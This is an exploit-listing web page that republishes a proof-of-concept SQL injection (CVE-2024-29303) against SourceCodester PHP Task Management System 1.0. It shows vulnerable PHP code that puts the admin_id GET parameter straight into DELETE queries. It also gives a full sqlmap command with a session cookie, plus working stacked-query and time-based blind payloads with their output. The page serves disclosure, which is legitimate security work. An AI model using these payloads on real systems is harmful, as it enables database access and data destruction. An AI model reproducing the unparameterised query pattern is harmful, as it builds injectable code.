Advertisement






SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection

CVE Category Price Severity
CVE-2024-29303 CWE-89 $500 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2024-03-26
CPE
cpe:/a:sourcecodester:task_management_system:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.7721 0.88962

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030063

Below is a copy:

SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection
```text
# Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection
# Date: 22 March 2024
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip
# Version: v1.0
# CVE: CVE-2024-29303
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(taskmatic/admin-manage-user.php):

if(isset($_GET['delete_user'])){
  $action_id = $_GET['admin_id'];

  $task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id";
  $delete_task = $obj_admin->db->prepare($task_sql);
  $delete_task->execute();

  $attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id";
  $delete_attendance = $obj_admin->db->prepare($attendance_sql);
  $delete_attendance->execute();
  
  $sql = "DELETE FROM tbl_admin WHERE user_id = :id";
  $sent_po = "admin-manage-user.php";
  $obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po);
}

-> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs
---
Parameter: admin_id (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM)
---
```

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.